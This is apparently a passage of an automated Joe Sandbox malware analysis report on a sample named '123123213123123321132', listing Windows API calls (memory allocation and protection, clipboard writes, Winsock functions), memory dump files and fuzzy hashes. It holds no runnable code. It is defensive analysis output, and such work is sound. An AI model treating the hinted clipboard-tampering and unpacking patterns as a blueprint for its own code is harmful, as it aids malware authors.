                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B22,00000001,000000FF), ref: 004F2BFE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2C88
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CCE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F2CF1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                        • Instruction ID: d821757bbb06b5f881817bb4be3b83133dcd2ebdcf47b2e92145d0cebd45ebc1
                                                                                                                                                        • Opcode Fuzzy Hash: 72ef37a4ce696f50df890290b9b7b99c0f9e4ea6355bbf9b4210c3caf82ba29b
                                                                                                                                                        • Instruction Fuzzy Hash: D631D2762042854FD3248F29D898A3BBBF5EFD9351F19856EE696C7381C779D808C720
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,004F7247,?), ref: 004F64C1
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F64E6
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F64EC
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F6515
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                        • Instruction ID: c39e4b2d7a975ea5970b06f88a1f0ae82272a8bb6f48ad921d14b69448efe04b
                                                                                                                                                        • Opcode Fuzzy Hash: f847da26358d00d5442f5224005a34bf56e55c89d248726b642e497024ea2ade
                                                                                                                                                        • Instruction Fuzzy Hash: FC0188352003485BC714EF24D880A77F3A9AF46258B19559DE5C657342CA39EC06CBA4
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0040139D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004013B3
                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000005), ref: 004013CA
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000005), ref: 004013D8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                        • Instruction ID: 1dc668918495c93d19b35d2f921703afc781594381be1afc9f76799b5a6aac2f
                                                                                                                                                        • Opcode Fuzzy Hash: be455565a85d393211932c010ec7194a6f72a0f8e03aef377b487af276531eef
                                                                                                                                                        • Instruction Fuzzy Hash: 280112B620070AAFC310CF69D884946FBF8FFA8314B10C55AE95983711C771F956CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2119310609.00000000007A9000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                        • Instruction ID: 3da77de92bf0c33bc52e49a700e110508d5e24bdc964440293630acdd4b79e25
                                                                                                                                                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                        • Instruction Fuzzy Hash: 9E719C71D0424ADFCB41CF98C881BEEBBF0BB4A314F244195E665F7281D238AA91DF65
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 007A9314
                                                                                                                                                          • Part of subcall function 007A9098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 007A90C1
                                                                                                                                                          • Part of subcall function 007A9098: VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A926D
                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 007A9366
                                                                                                                                                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 007A93C0
                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 007A93F3
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2119310609.00000000007A9000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$Alloc$Free$Protect
                                                                                                                                                        • String ID: ,
                                                                                                                                                        • API String ID: 1004437363-3772416878
                                                                                                                                                        • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                        • Instruction ID: fdc3e14bfe8bd98f10242a0524754a491cccef1a7c378bc05cf1da2b973c4246
                                                                                                                                                        • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                        • Instruction Fuzzy Hash: 0E51F975900709EFCB10DFA9C885A9EBBF4FF49344F10851AFA59A7240D374E951CBA4
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3509577899-0
                                                                                                                                                        • Opcode ID: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                        • Instruction ID: fd6922cf7a80161dd0570e670522332710b0b795b89aff0777e773291c4cc3ee
                                                                                                                                                        • Opcode Fuzzy Hash: ce9059a0f54269a3e857cd05decacb9db5d80458a844bd6716999fbfe2567560
                                                                                                                                                        • Instruction Fuzzy Hash: 34519373700606AFEB215FA4CC89EBB7BA9DFC6710B150B29FD0496151E738ED5086A1
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,007A12D6,00000001,00000364,00000000,?,000000FF,?,007A44E3,?,?,00000000), ref: 007A1789
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                        • Opcode ID: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                        • Instruction ID: 154d7c5781bc45dc2e1e534129e35c8708544993023084300fd8ef5a2906b620
                                                                                                                                                        • Opcode Fuzzy Hash: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                        • Instruction Fuzzy Hash: 77F0E931600234AAFB612A329C49B7B37489FC37B0F549312FC189A090EA2CDC0046E4
                                                                                                                                                        APIs
                                                                                                                                                        • LCMapStringEx.KERNELBASE(?,007A0C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 007A3D75
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2568140703-0
                                                                                                                                                        • Opcode ID: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                        • Instruction ID: f5da0ac4411f4585a45001adfe7889a157d9ede36c0b1885ca72ad1c5d438d21
                                                                                                                                                        • Opcode Fuzzy Hash: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                        • Instruction Fuzzy Hash: D2F07A3650021EFBCF126F90DC09DDE3F26EF89360F058211FA1825020C73AC931AB90
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,?), ref: 0079BFCE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                        • Opcode ID: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                        • Instruction ID: 1fc4dd6c3aeaaee0817216e36ba63e5b521813be904bdd1d1e2e3dac9636e59c
                                                                                                                                                        • Opcode Fuzzy Hash: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                        • Instruction Fuzzy Hash: BA312871900209AFCB10DFA9ED80BAEBBF5FF48710F10802AE559AB250D779A905CF94
                                                                                                                                                        APIs
                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0079BCC7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                        • Opcode ID: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                        • Instruction ID: f5ba4a2137a67daeb2fbb8b41962ef0f6117c7a666148d136e8c43de06cc210a
                                                                                                                                                        • Opcode Fuzzy Hash: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                        • Instruction Fuzzy Hash: F7E06DB5901622BB97112B20BE09E7B766CEF927413048525FA24E2240DF38DC11C6B5
                                                                                                                                                        APIs
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                        • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3392129136-0
                                                                                                                                                        • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                        • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                        • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                        • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                        • Instruction ID: 20744ecfedf4c28fd76f74ea8c3d8a786a43a3a68d56d5ce4262764e8bcaaa8c
                                                                                                                                                        • Opcode Fuzzy Hash: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                        • Instruction Fuzzy Hash: D2516CB1A122099FEF16CF59E9D17AEBBF1FB48310F14806AD405EB250D3789940CF51
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000003.2119310609.00000000007A9000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000003.2123313001.0000000000770000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_3_770000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                        • Instruction ID: 3a0743dcc37270f94bbdfc13b256ffb0086501d309c9e3f5df53f5aed5376cb7
                                                                                                                                                        • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                        • Instruction Fuzzy Hash: 66F06D79A00200EF8B24DF0AC548E95B7F6FBC6720B6546A5E504DB2A1D3B8ED54CBA0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000700000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.000000000073C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_26_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                        • API String ID: 0-3677570488
                                                                                                                                                        • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                        • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                        • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                        • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001A.00000002.2127866166.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001A.00000002.2127822918.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128051473.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128089737.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006E7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 0000001A.00000002.2128203260.00000000006F5000.00000002.00000001.01000000.00000014.sdmpDownload File
